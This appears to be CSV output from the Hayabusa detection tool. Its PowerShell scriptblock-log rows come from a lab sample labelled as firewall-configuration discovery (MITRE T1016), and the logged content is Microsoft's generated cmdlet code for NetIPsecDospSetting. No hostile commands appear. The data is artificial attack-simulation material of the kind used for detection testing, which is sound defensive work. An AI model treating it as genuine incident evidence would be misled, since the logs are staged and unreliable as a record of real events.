$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundP",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"arameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 